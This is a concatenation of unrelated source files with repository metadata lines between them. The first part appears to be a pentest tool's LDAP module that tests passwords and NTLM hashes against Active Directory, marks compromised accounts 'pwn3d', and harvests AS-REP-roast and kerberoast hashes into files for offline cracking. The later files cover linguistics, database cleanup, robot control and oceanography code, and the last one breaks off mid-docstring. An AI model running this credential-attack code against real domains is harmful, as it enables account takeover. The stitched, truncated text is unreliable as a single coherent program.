self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
#self.check_if_admin()
# Connect to LDAP
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.success(out)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.password))
else:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.password))
return False
except OSError as e:
self.logger.error(u'{}\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
out = u'{}{}:{}'.format('{}\\'.format(domain),
username,
nthash)
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
#self.check_if_admin()
self.logger.success(out)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.nthash))
else:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.nthash))
return False
except OSError as e:
self.logger.error(u'{}\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
return False
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=999):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
logging.debug(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= []
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'badPwdCount':
badPwdCount = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'badPasswordTime':
if str(attribute['vals'][0]) == '0':
badPasswordTime = '<never>'
else:
badPasswordTime = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, badPwdCount, badPasswordTime])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{:<30} badpwdcount: {} pwdLastSet: {}'.format(value[0], int(value[1],16),value[2]))
else:
self.logger.error("No entries found!")
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=[]
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
mustCommit = True
# if str(attribute['type']) == 'objectSid':
# print(format_sid((attribute['vals'][0])))
if mustCommit is True:
answers.append([name])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{}'.format(value[0]))
else:
self.logger.error("No entries found!")
return
def asreproast(self):
if self.password == '' and self.nthash == '' and self.kerberos == False:
return False
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return True
else:
self.logger.error("No entries found!")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
#users = dict( (vals[1], vals[0]) for vals in answers)
TGT = KerberosAttacks(self).getTGT_kerberoasting()
for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
self.kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
self.logger.highlight(u'{}'.format(r))
with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
hash_kerberoasting.write(r + '\n')
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('SPN: %s - %s' % (SPN,str(e)))
else:
self.logger.error("No entries found!")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
| bsd-2-clause | -7,680,955,245,509,472,000 | 46.227763 | 171 | 0.515652 | false | 4.383114 | false | false | false |
napsternxg/nltk-drt | nltk-drt/src/wntemporaldrt.py | 1 | 5538 | """
Extension of temporaldrt using WordNet ontology
"""
__author__ = " Emma Li, Peter Makarov, Alex Kislev"
__version__ = "1.0"
__date__ = "Tue, 24 Aug 2010"
import nltk
from nltk.corpus.reader.wordnet import WordNetCorpusReader
import temporaldrt as drt
from temporaldrt import DrtTokens, DrtFeatureConstantExpression
def singleton(cls):
instance_container = []
def getinstance():
if not len(instance_container):
instance_container.append(cls())
return instance_container[0]
return getinstance
@singleton
class WordNetLookup(object):
def __init__(self, path='corpora/wordnet'):
self.path = path
self.WN = None
def wn(self):
if not self.WN:
self.WN = WordNetCorpusReader(nltk.data.find(self.path))
def is_superclass_of(self, first, second):
"Is the second noun the superclass of the first one?"
self.wn()
try:
num_of_senses_first = self._num_of_senses(first)
num_of_senses_second = self._num_of_senses(second)
except: return False
for n in range(num_of_senses_second):
synset_second = self._noun_synset(second, ind=n)
for i in range(num_of_senses_first):
if synset_second in self._noun_synset(first, i).common_hypernyms(synset_second):
return True
return False
def is_adjective(self, word):
try:
self._num_of_senses(word, 'a')
return True
except: return False
def _noun_synset(self, noun, ind):
self.wn()
return self.WN.synset("%s.n.%s" % (noun, ind))
def _num_of_senses (self, word, pos='n'):
self.wn()
return len(self.WN._lemma_pos_offset_map[word][pos])
def is_person(self, word):
return self.is_superclass_of(word, 'person')
def is_animal(self, word):
return self.is_superclass_of(word, 'animal')
class DefiniteDescriptionDRS(drt.DefiniteDescriptionDRS):
def __init__(self, refs, conds):
self.wn = WordNetLookup()
super(drt.DefiniteDescriptionDRS, self).__init__(refs, conds)
def _strict_check (self, presupp_noun, other_cond):
other_noun = other_cond.function.variable.name
return (
presupp_noun == other_noun or
self.wn.is_superclass_of(other_noun, presupp_noun) or
(other_cond.is_propername() and (self.wn.is_person(presupp_noun) or self.wn.is_animal(presupp_noun)))
)
def _non_strict_check(self, presupp_noun, other_cond):
strict_check = self._strict_check(presupp_noun, other_cond)
if strict_check: return True
# If the strict check fails, check if both are people
other_noun = other_cond.function.variable.name
return (
(self.wn.is_person(presupp_noun) and self.wn.is_person(other_noun))
or self.wn.is_superclass_of(presupp_noun, other_noun)) # cat, kitty
def semantic_check(self, individuals, presupp_individuals, strict=False):
check = {True : self._strict_check,
False: self._non_strict_check}[strict]
# Strict check - passes if features match and 1) string matching 2) hyponym-hypernym relation, and
# 3) self.funcname is a person or animal and the antecedent is a proper name
# Non-strict check: both are people and features match
if isinstance(self.cond, DrtFeatureConstantExpression):
for individual in individuals:
if isinstance(individual, DrtFeatureConstantExpression) and check(self.function_name, individual):
return True
return False
else:
# If no features are used, we cannot guarantee that the condition we got self.function_name from wasn't an adjective.
# Likewise, individuals contains not only nouns but also adjectives, and we don't know which are which
found_noun = False # We should find at least one noun
for presupp_individual in presupp_individuals[self.variable]:
presupp_noun = presupp_individual.function.variable.name
if not self.wn.is_adjective(presupp_noun):
found_noun = True
break
# If we found no noun (that is not also an adjective), ignore the 'is adjective' check for presupposition individuals
# (in that case, we had probably better ignore this check for 'individuals', too)
for individual in individuals:
other_noun = individual.function.variable.name
if found_noun and self.wn.is_adjective(other_noun): continue
for presupp_individual in presupp_individuals[self.variable]:
presupp_noun = presupp_individual.function.variable.name
if found_noun and self.wn.is_adjective(presupp_noun): continue
if check (presupp_noun, individual):
return True
return False
class DrtParser(drt.DrtParser):
def handle_PresuppositionDRS(self, tok, context):
if tok == DrtTokens.DEFINITE_DESCRIPTION_DRS:
self.assertNextToken(DrtTokens.OPEN)
drs = self.handle_DRS(tok, context)
return DefiniteDescriptionDRS(drs.refs, drs.conds)
else:
return drt.DrtParser.handle_PresuppositionDRS(self, tok, context) | apache-2.0 | -8,525,457,456,032,012,000 | 41.937984 | 129 | 0.615565 | false | 3.699399 | false | false | false |
vitalti/sapl | sapl/legacy/scripts/street_sweeper.py | 1 | 5080 | #!/usr/bin/python
# requisito: pip install PyMySQL
import pymysql.cursors
HOST = 'localhost'
USER = 'root'
PASSWORD = ''
DB = ''
SELECT_EXCLUIDOS = "SELECT %s FROM %s WHERE ind_excluido = 1 ORDER BY %s"
REGISTROS_INCONSISTENTES = "DELETE FROM %s WHERE %s "
"in (%s) AND ind_excluido = 0 "
EXCLUI_REGISTRO = "DELETE FROM %s WHERE ind_excluido=1"
NORMA_DEP = "DELETE FROM vinculo_norma_juridica WHERE cod_norma_referente in (%s) OR \
cod_norma_referida in (%s) AND ind_excluido = 0 "
mapa = {} # mapa com tabela principal -> tabelas dependentes
mapa['tipo_autor'] = ['autor']
mapa['materia_legislativa'] = ['acomp_materia', 'autoria', 'despacho_inicial',
'documento_acessorio', 'expediente_materia',
'legislacao_citada', 'materia_assunto',
'numeracao', 'ordem_dia', 'parecer',
'proposicao', 'registro_votacao',
'relatoria', 'tramitacao']
mapa['norma_juridica'] = ['vinculo_norma_juridica']
mapa['comissao'] = ['composicao_comissao']
mapa['sessao_legislativa'] = ['composicao_mesa']
mapa['tipo_expediente'] = ['expediente_sessao_plenaria']
"""
mapa['autor'] = ['tipo_autor', 'partido', 'comissao', 'parlamentar']
mapa['parlamentar'] = ['autor', 'autoria', 'composicao_comissao',
'composicao_mesa', 'dependente', 'filiacao',
'mandato', 'mesa_sessao_plenaria', 'oradores',
'oradores_expediente', 'ordem_dia_presenca',
'registro_votacao_parlamentar', 'relatoria',
'sessao_plenaria_presenca', 'unidade_tramitacao']
"""
def get_ids_excluidos(cursor, query):
"""
recupera as PKs de registros com ind_excluido = 1 da tabela principal
"""
cursor.execute(query)
excluidos = cursor.fetchall()
# flat tuple of tuples with map transformation into string
excluidos = [str(val) for sublist in excluidos for val in sublist]
return excluidos
def remove_tabelas(cursor, tabela_principal, pk, query_dependentes=None):
QUERY = SELECT_EXCLUIDOS % (pk, tabela_principal, pk)
ids_excluidos = get_ids_excluidos(cursor, QUERY)
print("\nRegistros da tabela '%s' com ind_excluido = 1: %s" %
(tabela_principal.upper(), len(ids_excluidos)))
"""
Remove registros de tabelas que dependem da tabela principal,
e que se encontram com ind_excluido = 0 (nao excluidas), se
tais registros existirem.
"""
if ids_excluidos:
print("Dependencias inconsistentes")
for tabela in mapa[tabela_principal]:
QUERY_DEP = REGISTROS_INCONSISTENTES % (
tabela, pk, ','.join(ids_excluidos))
# Trata caso especifico de norma_juridica
if query_dependentes:
QUERY_DEP = query_dependentes % (','.join(ids_excluidos),
','.join(ids_excluidos))
print(tabela.upper(), cursor.execute(QUERY_DEP))
"""
Remove todos os registros com ind_excluido = 1 das tabelas
dependentes e da tabela principal, nesta ordem.
"""
print("\n\nRegistros com ind_excluido = 1")
for tabela in mapa[tabela_principal] + [tabela_principal]:
QUERY = EXCLUI_REGISTRO % tabela
print(tabela.upper(), cursor.execute(QUERY))
def remove_excluidas(cursor):
cursor.execute("SHOW_TABLES")
for row in cursor.fetchall():
print(row)
def remove_proposicao_invalida(cursor):
return cursor.execute(
"DELETE FROM proposicao WHERE cod_mat_ou_doc is null")
def remove_materia_assunto_invalida(cursor):
return cursor.execute(
"DELETE FROM materia_assunto WHERE cod_assunto = 0")
def shotgun_remove(cursor):
for tabela in get_ids_excluidos(cursor, "SHOW TABLES"):
try:
cursor.execute("DELETE FROM %s WHERE ind_excluido = 1" % tabela)
except:
pass
if __name__ == '__main__':
connection = pymysql.connect(host=HOST,
user=USER,
password=PASSWORD,
db=DB)
cursor = connection.cursor()
# TIPO AUTOR
remove_tabelas(cursor, 'tipo_autor', 'tip_autor')
# MATERIA LEGISLATIVA
remove_tabelas(cursor, 'materia_legislativa', 'cod_materia')
# NORMA JURIDICA
remove_tabelas(cursor, 'norma_juridica', 'cod_norma', NORMA_DEP)
# COMISSAO
remove_tabelas(cursor, 'comissao', 'cod_comissao')
# SESSAO LEGISLATIVA
remove_tabelas(cursor, 'sessao_legislativa', 'cod_sessao_leg')
# EXPEDIENTE SESSAO
remove_tabelas(cursor, 'tipo_expediente', 'cod_expediente')
# AUTOR
remove_tabelas(cursor, 'autor', 'cod_autor')
# PARLAMENTAR
remove_tabelas(cursor, 'parlamentar', 'cod_parlamentar')
# PROPOSICAO
remove_proposicao_invalida(cursor)
# MATERIA_ASSUNTO
remove_materia_assunto_invalida(cursor)
# shotgun_remove(cursor)
cursor.close()
| gpl-3.0 | -3,535,301,259,724,776,000 | 32.866667 | 86 | 0.610039 | false | 3.00414 | false | false | false |
CentralLabFacilities/m3meka | python/m3/nanokontrol.py | 2 | 2897 | # -*- coding: utf-8 -*-
#M3 -- Meka Robotics Robot Components
#Copyright (c) 2010 Meka Robotics
#Author: [email protected] (Aaron Edsinger)
#M3 is free software: you can redistribute it and/or modify
#it under the terms of the GNU Lesser General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#M3 is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Lesser General Public License for more details.
#You should have received a copy of the GNU Lesser General Public License
#along with M3. If not, see <http://www.gnu.org/licenses/>.
#import roslib; roslib.load_manifest('kontrol')
#from kontrol.msg import Kontrol
import time
import rospy
from threading import Thread
from sensor_msgs.msg import Joy
import os
import subprocess
class M3KontrolThread(Thread):
def __init__(self,verbose=True):
Thread.__init__(self)
self.korg = subprocess.Popen(['rosrun', 'korg_nanokontrol', 'kontrol.py','3'])
self.sliders = [0]*9
self.knobs = [0]*9
self.buttons = [0]*18
self.verbose=verbose
def start(self):
if self.verbose:
print 'Starting M3KontrolThread...'
rospy.init_node('korg_nanokontrol',anonymous=True,disable_signals=True) #allow Ctrl-C to master process
rospy.Subscriber("/joy",Joy,self.callback)
Thread.start(self)
def stop(self):
os.system("pkill -P " + str(self.korg.pid))
os.kill(self.korg.pid,9)
rospy.signal_shutdown('Exiting')
def run(self):
rospy.spin()
def callback(self,data):
if self.verbose:
print data
self.sliders = data.axes[:len(self.sliders)]
self.knobs = data.axes[len(self.sliders):len(self.sliders)+len(self.knobs)]
self.buttons = data.buttons
if self.verbose:
print self.sliders
print self.knobs
print self.buttons
class M3Kontrol:
def __init__(self,verbose=False):
self.kontrol_thread = M3KontrolThread(verbose)
self.kontrol_thread.start()
def get_slider(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.sliders):
return self.kontrol_thread.sliders[idx]
else:
return 0
def get_knob(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.knobs):
return self.kontrol_thread.knobs[idx]
else:
return 0
def get_button(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.buttons):
return self.kontrol_thread.buttons[idx]
else:
return 0
def stop(self):
self.kontrol_thread.stop()
| mit | 736,258,013,835,585,500 | 30.846154 | 111 | 0.63514 | false | 3.532927 | false | false | false |
TheKingInYellow/PySeidon | pyseidon/stationClass/functionsStationThreeD.py | 2 | 10617 | #!/usr/bin/python2.7
# encoding: utf-8
from __future__ import division
import numpy as np
import numexpr as ne
from pyseidon.utilities.miscellaneous import *
from pyseidon.utilities.BP_tools import *
import time
# Custom error
from pyseidon_error import PyseidonError
class FunctionsStationThreeD:
"""
**'Utils3D' subset of Station class gathers useful functions for 3D runs**
"""
def __init__(self, variable, grid, plot, History, debug):
#Inheritance
self._debug = debug
self._plot = plot
#Create pointer to FVCOM class
setattr(self, '_var', variable)
setattr(self, '_grid', grid)
setattr(self, '_History', History)
def search_index(self, station):
"""Search for the station index"""
if type(station)==int:
index = station
elif type(station).__name__ in ['str', 'ndarray']:
station = "".join(station).strip().upper()
for i in range(self._grid.nele):
if station=="".join(self._grid.name[i]).strip().upper():
index=i
else:
raise PyseidonError("---Wrong station input---")
if not 'index' in locals():
raise PyseidonError("---Wrong station input---")
return index
def depth(self, station, debug=False):
"""
Compute depth at given point
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- dep = depth, 2D array (ntime, nlevel)
Notes:
- depth convention: 0 = free surface
- index is used in case one knows already at which
element depth is requested
"""
debug = debug or self._debug
if debug:
print "Computing depth..."
start = time.time()
#Search for the station
index = self.search_index(station)
#Compute depth
h = self._grid.h[index]
el = self._var.el[:,index]
zeta = el + h
siglay = self._grid.siglay[:,index]
dep = zeta[:, np.newaxis]*siglay[np.newaxis, :]
if debug:
end = time.time()
print "Computation time in (s): ", (end - start)
return np.squeeze(dep)
def verti_shear(self, station, t_start=[], t_end=[], time_ind=[],
bot_lvl=[], top_lvl=[], graph=True, debug=False):
"""
Compute vertical shear at any given location
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- dveldz = vertical shear (1/s), 2D array (time, nlevel - 1)
